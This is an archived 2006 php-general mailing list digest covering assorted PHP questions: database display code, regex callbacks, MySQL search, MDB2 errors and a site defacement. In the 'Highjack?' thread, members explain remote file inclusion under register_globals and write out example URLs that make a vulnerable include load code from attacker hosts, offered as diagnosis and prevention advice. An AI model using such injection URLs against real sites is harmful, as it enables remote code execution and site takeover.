php-general Digest 13 Nov 2006 17:56:39 -0000 Issue 4457
php-general Digest 13 Nov 2006 17:56:39 - Issue 4457 Topics (messages 244543 through 244560): one click - two actions? 244543 by: Mel 244545 by: John Meyer Re: Parsing brackets in text 244544 by: Roman Neuhauser 244547 by: Dotan Cohen 244551 by: Roman Neuhauser Re: Mysql strategy 244546 by: Dotan Cohen 244558 by: Dotan Cohen Re: How do you do the ? mark after a filename 244548 by: Ivo F.A.C. Fokkema server side security 244549 by: H. Dan Phillips Highjack? 244550 by: tedd 244559 by: Eric Butera 244560 by: bruce DOM Validation using PHP 244552 by: Raphael Martins Re: problem with imagestring() 244553 by: Piotr Sulecki MDB2 : never ending story 244554 by: Alain Roger 244555 by: Paul Scott 244556 by: Alain Roger 244557 by: Paul Scott Administrivia: To subscribe to the digest, e-mail: [EMAIL PROTECTED] To unsubscribe from the digest, e-mail: [EMAIL PROTECTED] To post to the list, e-mail: php-general@lists.php.net -- ---BeginMessage--- Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query? The image and the description are both in the same table in my database. I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active. http://www.squareinch.net/single_page.php This is the code I have for the image area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC)) { echo span class='navCompany'{$aaa['companyName']}/spanspan class='navArrow' /span\n; /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$aaa['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); foreach($aaa as $jobType) { $bbb = mysql_fetch_array($result2,MYSQL_ASSOC); echo span class='navText'a href='single_page.php?art=.$bbb ['pix'].'{$bbb['jobType']}/a/span\n; } echo br; } ? /div div class=navbox3?php $image = $_GET['art']; ? img src=images/?php print ($image) ? alt=Portfolio Item border=0 width=285 height=285/div This is the code I have for the description area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$row['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); $url = mysql_query($result2); foreach($row as $url) { $row = mysql_fetch_array($result2,MYSQL_ASSOC); if (url={$row['url']}) echo span class='navText'a href='{$row['url']}'{$row['web']}/ a/span; } echo br; } ? ---End Message--- ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? Mel wrote: Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query? The image and the description are both in the same table in my database. I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active. http://www.squareinch.net/single_page.php This is the code I have for the image area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query);
php-general Digest 14 Nov 2006 06:16:51 -0000 Issue 4458
php-general Digest 14 Nov 2006 06:16:51 - Issue 4458 Topics (messages 244561 through 244583): Re: Highjack? 244561 by: Matt Carlson 244562 by: Rory Browne 244563 by: bruce Re: How do you do the ? mark after a filename 244564 by: Norbert Ehart Scrolling text 244565 by: Alain Roger 244566 by: Robert Cummings Re: one click - two actions? 244567 by: Mel 244569 by: Warren Vail 244571 by: Mel 244577 by: Warren Vail Problem with PHP 5.2.0 244568 by: bluefx13.gmail.com 244580 by: Kevin Waterson Re: Mysql strategy 244570 by: David Tulloh 244572 by: Robert Cummings 244578 by: Chris 244579 by: Larry Garfield Compressing both php and linked css files with ob_gzhandler and htaccess 244573 by: Graham Anderson 244574 by: Jochem Maas 244575 by: Graham Anderson 244576 by: Graham Anderson Re: server side security 244581 by: Chris 244582 by: Ligaya A. Turmelle Re: problem with php[4,5] (horde 2/3) 244583 by: Chris Administrivia: To subscribe to the digest, e-mail: [EMAIL PROTECTED] To unsubscribe from the digest, e-mail: [EMAIL PROTECTED] To post to the list, e-mail: php-general@lists.php.net -- ---BeginMessage--- With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) are automatically populated into variables. With that in mind www.example.com/index.php?path=remoteexplot.com/ would then yield include('remoteexplit.com/foo'); thus including ANY code they wish. - Original Message From: bruce [EMAIL PROTECTED] To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED] Cc: PHP General List php-general@lists.php.net Sent: Monday, November 13, 2006 11:55:13 AM Subject: RE: [PHP] Highjack? eric... you say how embarrasing regaring the $path.'foo' i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -Original Message- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP] Highjack? On 11/13/06, tedd [EMAIL PROTECTED] wrote: Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php ---End Message--- ---BeginMessage--- -- Forwarded message -- From: Rory Browne [EMAIL PROTECTED] Date: Nov 13, 2006 7:12 PM Subject: Re: [PHP] Highjack? To: [EMAIL PROTECTED] On 11/13/06, bruce [EMAIL PROTECTED] wrote: eric... you say how embarrasing regaring the $path.'foo' i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST) If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -Original Message- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP]
[PHP] one click - two actions?
Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query? The image and the description are both in the same table in my database. I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active. http://www.squareinch.net/single_page.php This is the code I have for the image area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC)) { echo span class='navCompany'{$aaa['companyName']}/spanspan class='navArrow' /span\n; /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$aaa['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); foreach($aaa as $jobType) { $bbb = mysql_fetch_array($result2,MYSQL_ASSOC); echo span class='navText'a href='single_page.php?art=.$bbb ['pix'].'{$bbb['jobType']}/a/span\n; } echo br; } ? /div div class=navbox3?php $image = $_GET['art']; ? img src=images/?php print ($image) ? alt=Portfolio Item border=0 width=285 height=285/div This is the code I have for the description area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$row['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); $url = mysql_query($result2); foreach($row as $url) { $row = mysql_fetch_array($result2,MYSQL_ASSOC); if (url={$row['url']}) echo span class='navText'a href='{$row['url']}'{$row['web']}/ a/span; } echo br; } ?
Re: [PHP] Parsing brackets in text
# [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200: On 13/11/06, Chris [EMAIL PROTECTED] wrote: ?php function makeLink($matches) { $returnString=b . $matches[1] . /b; return $returnString; } $articleText=This is a very [long] string.; $articleText=preg_replace_callback('/\[([a-z]+)\]/i' , makeLink, $articleText); print $articleText . \n; ? The callback takes whatever the regular expressions returns (alpha characters between [ and ]) and runs it through function makeLink. Not sure how that will go with multiple []'s etc in the same string but it should get you started. I didn't know that I had to call the function like that- I don't remember ever seeing it called that way. It's done this way in all the examples on http://cz.php.net/manual/en/function.preg-replace-callback.php What documentation did you read? Also, I must google the meaning of the (~+) in the regex. No need to google: http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php Skip the Differences From Perl section. -- How many Vietnam vets does it take to screw in a light bulb? You don't know, man. You don't KNOW. Cause you weren't THERE. http://bash.org/?255991 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] one click - two actions?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? Mel wrote: Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query? The image and the description are both in the same table in my database. I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active. http://www.squareinch.net/single_page.php This is the code I have for the image area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC)) { echo span class='navCompany'{$aaa['companyName']}/spanspan class='navArrow' /span\n; /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$aaa['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); foreach($aaa as $jobType) { $bbb = mysql_fetch_array($result2,MYSQL_ASSOC); echo span class='navText'a href='single_page.php?art=.$bbb['pix'].'{$bbb['jobType']}/a/span\n; } echo br; } ? /div div class=navbox3?php $image = $_GET['art']; ? img src=images/?php print ($image) ? alt=Portfolio Item border=0 width=285 height=285/div This is the code I have for the description area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$row['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); $url = mysql_query($result2); foreach($row as $url) { $row = mysql_fetch_array($result2,MYSQL_ASSOC); if (url={$row['url']}) echo span class='navText'a href='{$row['url']}'{$row['web']}/a/span; } echo br; } ? -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org iD8DBQFFWGE2bHd4gglFmoARAnNWAJ0fs+NHm5MbNwDpm3E7Flu3giU+LQCgkF7O uCu6zhUFfviNC+aaxpNy+Vg= =NQVC -END PGP SIGNATURE- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
On 13/11/06, Chris [EMAIL PROTECTED] wrote: Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword No. Horribly inefficient. 2) To select the varchar field from all the rows, and search through them with php's array functions? No. Make the database do the work. Use full text indexing: http://dev.mysql.com/doc/refman/4.1/en/fulltext-search.html Thanks, Chris, but that approach won't work as I don't know all the values that I'll be searching for at any one time. In fact, I only know one of them at a time. This is the makeLink function in another thread that you helped me in. However, I do see other use of the full-text search functions in my future! This looks like it could save me quite a bit of work on another project. Dotan Cohen -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Parsing brackets in text
On 13/11/06, Roman Neuhauser [EMAIL PROTECTED] wrote: # [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200: On 13/11/06, Chris [EMAIL PROTECTED] wrote: ?php function makeLink($matches) { $returnString=b . $matches[1] . /b; return $returnString; } $articleText=This is a very [long] string.; $articleText=preg_replace_callback('/\[([a-z]+)\]/i' , makeLink, $articleText); print $articleText . \n; ? The callback takes whatever the regular expressions returns (alpha characters between [ and ]) and runs it through function makeLink. Not sure how that will go with multiple []'s etc in the same string but it should get you started. I didn't know that I had to call the function like that- I don't remember ever seeing it called that way. It's done this way in all the examples on http://cz.php.net/manual/en/function.preg-replace-callback.php What documentation did you read? In the first example on that page, it looks to me like it should just return the text next_year, and not call that function. Obviously, it is my misunderstanding of the way that the funciton works, and not in the function itself. I do learn php from TFM and this list, not from a course. Just like in any learning environment, I could misinterpret what is taught to me and need to ask a question, or not even know that I misinterpreted and not know that I need to ask a question. This is a case of the latter, clearly, because I have never needed to do anything other than a simple str_replace until now. Also, I must google the meaning of the (~+) in the regex. No need to google: http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php Skip the Differences From Perl section. That I have read at least three or four times. I still don't capture all of it, but I try. You are correct, I should have referenced that right away. It won't hurt for me to read it again, too. Thank you. Dotan Cohen -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How do you do the ? mark after a filename
On Sun, 12 Nov 2006 22:02:51 -0700, Thomas Bonham wrote: Thank you for that, it was a big help. Can I also call function that way? Again thank you for your help. Thomas Do you mean: /index.php?action=search ?php if (isset($_GET['action']) $_GET['action'] == 'search') { search_items(); } else { view_all_items(); } ? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] server side security
Let me begin by saying I'm a newbie to PHP and open source. I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo. I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people. Any and all suggestions will be greatly appreciated. Thks Dan Phillips -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Highjack?
Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Parsing brackets in text
# [EMAIL PROTECTED] / 2006-11-13 15:02:53 +0200: http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php Skip the Differences From Perl section. That I have read at least three or four times. I still don't capture all of it, but I try. You are correct, I should have referenced that right away. It won't hurt for me to read it again, too. Thank you. Just keep reading it, but not without trying out various things yourself. I had hard time hammering it into my head a few years ago, but it has been paying off like crazy. Your gain might vary. -- How many Vietnam vets does it take to screw in a light bulb? You don't know, man. You don't KNOW. Cause you weren't THERE. http://bash.org/?255991 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] DOM Validation using PHP
Hi there! I´m building a form validator using PHP and JS. It´s working fine by now, but I want to make a little improvement. Here is how its working now: 1. The user fill the form. Every time he leaves the field, the JS code match the value against a regexp to validate. 2. When the user submits the form, the PHP script match all the values against the same regexp's. Now, i want to validate my fields to prevent XSS, allowing my html tags but only the attributes that I want. I thought something like: (the tags and the valid attributes). ?php $form_html_validation = array( p=array(), a=array(href,name,rel), ol=array(), ul=array(), li=array(), h2=array(), h3=array(), h4=array(), h5=array(), h6=array(), strong=array(), em=array() ); $valid_elements = .join(,array_keys($form_html_validation)).; $userInput = strip_tags($userInput,$valid_elements); //perform DOM Attribute Validation ? But I don´t know how to loop over every attribute for each tag in the DomTree. Someone has any ideas? Thank You -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: problem with imagestring()
Ave! Forget it. It turned out that the culprit was Debian-specific patch of libgd2. Sorry for bothering you. Regards, Piotr Sulecki. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] MDB2 : never ending story
Dear all, i still got the same error when i run this code : == Call to a member function fetchRow() on a non-object on line while (( so it seems that package MDB2_Driver_pgsql is not loaded or something is wrong... i'm really lost...4 days that i work on it without any solution... $db2 = MDB2::connect($dsn, $options); if (PEAR::isError($db2)) { die(Error connection : .$db2-getMessage().brbr.$db2-getUserinfo()); } $res = $db2-exec($query); if (PEAR::isError($res)) { die(Error connection : .$res-getMessage().brbr.$res-getUserinfo()); } while (($row = $res-fetchRow())) { echo $row[0] . br; } -- Alain Windows XP SP2 PostgreSQL 8.1.4 Apache 2.0.58 PHP 5
Re: [PHP] MDB2 : never ending story
On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote: Dear all, i still got the same error when i run this code : == Call to a member function fetchRow() on a non-object on line while Then why not try something else? Try this: $db2 = MDB2::connect($dsn, $options); if (PEAR::isError($db2)) { die(Error connection : .$db2-getMessage().brbr.$db2-getUserinfo()); } $db2-setLimit($first, $count); //set the first row that you want and the number of rows after that that you want... $res = $db2-exec($stmt); if (PEAR::isError($res)) { $ret = false; } else { .; --Paul All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] MDB2 : never ending story
And therefore how do you want to get the result set ? nothing is solved now... i still need a fetchrow or fetchOne On 11/13/06, Paul Scott [EMAIL PROTECTED] wrote: On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote: Dear all, i still got the same error when i run this code : == Call to a member function fetchRow() on a non-object on line while Then why not try something else? Try this: $db2 = MDB2::connect($dsn, $options); if (PEAR::isError($db2)) { die(Error connection : .$db2-getMessage().brbr.$db2-getUserinfo()); } $db2-setLimit($first, $count); //set the first row that you want and the number of rows after that that you want... $res = $db2-exec($stmt); if (PEAR::isError($res)) { $ret = false; } else { .; --Paul All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm -- Alain Windows XP SP2 PostgreSQL 8.1.4 Apache 2.0.58 PHP 5
Re: [PHP] MDB2 : never ending story
On Mon, 2006-11-13 at 18:07 +0100, Alain Roger wrote: And therefore how do you want to get the result set ? nothing is solved now... i still need a fetchrow or fetchOne Have you read _any_ of the MDB2 docs?? rant warning As far as I can see you have decided not to even _try_ any of the solutions that people on this list, and others, have given you... My final advice to you is RTFM and google it. /rant warning --Paul All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
On 13/11/06, David Tulloh [EMAIL PROTECTED] wrote: Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no joins involved. In this case the query will scale linearly with your database size so you shouldn't worry too much about it slowing down over time. By that do you mean that it is O=n? Yes, it is linear. It's a matter of knowing if 30 LIKE queries are more efficient than one big query that brings down three fields (an INT and two VARCHAR's) for every row in the table. Now that I'm thinking about it, I'm probably better off with one big query, as it is only one query, and I'd imagine that flipping through an array 30 times is faster than making 30 database calls. Dotan Cohen http://what-is-what.com/what_is/digg.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Highjack?
On 11/13/06, tedd [EMAIL PROTECTED] wrote: Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Highjack?
eric... you say how embarrasing regaring the $path.'foo' i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -Original Message- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP] Highjack? On 11/13/06, tedd [EMAIL PROTECTED] wrote: Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Highjack?
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) are automatically populated into variables. With that in mind www.example.com/index.php?path=remoteexplot.com/ would then yield include('remoteexplit.com/foo'); thus including ANY code they wish. - Original Message From: bruce [EMAIL PROTECTED] To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED] Cc: PHP General List php-general@lists.php.net Sent: Monday, November 13, 2006 11:55:13 AM Subject: RE: [PHP] Highjack? eric... you say how embarrasing regaring the $path.'foo' i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -Original Message- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP] Highjack? On 11/13/06, tedd [EMAIL PROTECTED] wrote: Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Fwd: [PHP] Highjack?
-- Forwarded message -- From: Rory Browne [EMAIL PROTECTED] Date: Nov 13, 2006 7:12 PM Subject: Re: [PHP] Highjack? To: [EMAIL PROTECTED] On 11/13/06, bruce [EMAIL PROTECTED] wrote: eric... you say how embarrasing regaring the $path.'foo' i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST) If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -Original Message- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP] Highjack? On 11/13/06, tedd [EMAIL PROTECTED] wrote: Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt . -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Highjack?
rory.. thanks.. i had meant to say assuming globals is off... -Original Message- From: Rory Browne [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 10:12 AM To: PHP Subject: Fwd: [PHP] Highjack? -- Forwarded message -- From: Rory Browne [EMAIL PROTECTED] Date: Nov 13, 2006 7:12 PM Subject: Re: [PHP] Highjack? To: [EMAIL PROTECTED] On 11/13/06, bruce [EMAIL PROTECTED] wrote: eric... you say how embarrasing regaring the $path.'foo' i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST) If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript .txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -Original Message- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP] Highjack? On 11/13/06, tedd [EMAIL PROTECTED] wrote: Hi gang: While this is not an obvious php question, it does deal with security which is a concern. Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php. You can see the result at: http://xn--u2g.com/index1.php It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again? Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt . -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How do you do the ? mark after a filename
Thomas Bonham schrieb: I keep seeing the ? mark after many file names index.php?id=234. So what I would like to know is how do you make them. I have heard that they can make a programs life sampler when doing somethings with a database. in my scripts, i do it with the switch-syntax === snip === switch($_GET['x']) { case show: include(show.php); break; case search: include(search.php); break; case new: include(add_entry.html); break; default: include(show.php); break; } ? === snip === now you can enter http://www.domain.at/index.php?x=search; or x=show; cu, norbert. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Scrolling text
